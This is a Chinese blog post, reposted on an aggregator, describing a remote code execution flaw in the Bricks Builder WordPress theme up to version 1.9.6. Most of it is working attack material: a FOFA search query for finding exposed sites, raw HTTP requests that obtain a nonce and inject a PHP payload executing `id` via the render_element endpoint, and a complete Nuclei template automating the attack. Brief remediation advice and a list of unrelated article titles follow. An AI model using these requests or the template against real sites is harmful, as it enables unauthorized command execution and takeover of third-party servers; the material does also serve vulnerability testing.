当前位置：首页 > news >正文

金融网站源码/中国三大搜索引擎

news 文章来源：https://blog.csdn.net/weixin_52204925/article/details/136265414 2025/3/29 20:26:47

金融网站源码,中国三大搜索引擎,宁波网站建设系统介绍,网站做sem对优化有影响吗免责声明：文章来源互联网收集整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该…

免责声明：文章来源互联网收集整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

Bricks Builder是一款用于WordPress的开发主题，提供直观的拖放界面，用于设计和构建WordPress网站。它使用户能够轻松创建自定义的网页布局和设计，无需编写或了解复杂的代码。Bricks Builder具有用户友好的界面和强大的功能，使用户可以通过简单的拖放操作添加、编辑和排列各种网页元素，例如文本框、图像、按钮、导航菜单等。它为WordPress用户提供了一种直观且便捷的方式来构建专业和吸引人的网站，无论是个人博客、商业网站还是电子商务平台。

由於函數"prepare_query_vars_from_settings "中的一个 eval 函数错误调用，導致遠程代碼執行漏洞，惡意攻擊者可能會利用此漏洞執行惡意代碼，從而獲取服務器權限。

影響版本

Brick Builder 主题在低于<= 1.9.6

Ⅱ、fofa语句

body="/wp-content/themes/bricks/"

Ⅲ、漏洞复现

POC-1

GET / HTTP/1.1
Host: 127.0.0.1

POC-2

POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: */*
Content-Type: application/json{"postId": "1","nonce": "dc50d26123","element": {"name": "container","settings": {"hasLoop": "true","query": {"useQueryEditor": true,"queryEditor": "throw new Exception(`id`);","objectType": "post"}}}
}

1、构建 POC，获取nonce值

2、使用第一步获取的nonce值构造数据包，执行RCE

Ⅳ、Nuclei-POC

id: WordPres-Bricks-Builder-RCEinfo:name: 由於函數"prepare_query_vars_from_settings "中的一个 eval 函数错误调用，導致遠程代碼執行漏洞，惡意攻擊者可能會利用此漏洞執行惡意代碼，從而獲取服務器權限。author: WLFseverity: highmetadata: fofa-query: body="/wp-content/themes/bricks/"
variables:filename: "{{to_lower(rand_base(10))}}"boundary: "{{to_lower(rand_base(20))}}"
http:- raw:- |GET / HTTP/1.1Host: {{Hostname}}- |POST /wp-json/bricks/v1/render_element HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0Accept: */*Content-Type: application/json{"postId": "1","nonce": "{{path}}","element": {"name": "container","settings": {"hasLoop": "true","query": {"useQueryEditor": true,"queryEditor": "throw new Exception(`id`);","objectType": "post"}}}}extractors:- type: regexname: pathgroup: 1regex:- '"nonce":"(\w*)"'internal: truematchers:- type: dsldsl:- status_code==200 && contains_all(body,"Exception","gid=","uid=")

Ⅴ、修复建议

1、关闭互联网暴露面或接口设置访问权限

2、部署WAF对站点路径进行防护

3、将Bricks Builder组件升级只安全版本

金融网站源码/中国三大搜索引擎

相关文章：

WordPres Bricks Builder 前台RCE漏洞

渗透测试—信息收集

安卓adb调试备忘录

【软件架构】01-架构的概述

Vue 图片轮播第三方库介绍

设置主从复制时发生报错Could not find first log file name in binary log index file‘；解决方案

React Context的使用方法

ElasticSearch索引数据备份与恢复

kubernetes日志收集 fluent-operator 动态索引名的实现

pip换源

7.（数据结构）堆

AWS Elastic Beanstalk通过应用负载均衡配置https

AC自动机：文本搜索的加速器

备战蓝桥杯---基础算法刷题1

探索 Flutter 中的动画：使用 flutter_animate

装机容量对光伏发电量的影响有多大？如何通过装机容量计算发电量？

软考37-上午题-【数据库】-数据模型、数据库的三级模式和二级映像

06 分频器设计

力扣hot100题解（python版7-9题）

ECMAScript 6+ 新特性 ( 四 ) 迭代器与生成器

【MySQL】事务的一致性究竟怎么理解？

证件照（兼容H5，APP，小程序）

pytorch-textregression，中文文本回归实践，支持多值输出

go语言学而思【持续更新】

LVS-NAT之VMNET环境搭建

[TCP] TCP/IP 基础知识词典（2）

【牛牛送书 | 第四期】《高效使用Redis：一书学透数据存储与高可用集群》带你快速学习使用Redis

Threejs 实现3D影像地图，Json地图，地图下钻

根据Excel创建管道系统及材质

第八篇【传奇开心果系列】python的文本和语音相互转换库技术点案例示例：Google Text-to-Speech虚拟现实（VR）沉浸式体验经典案例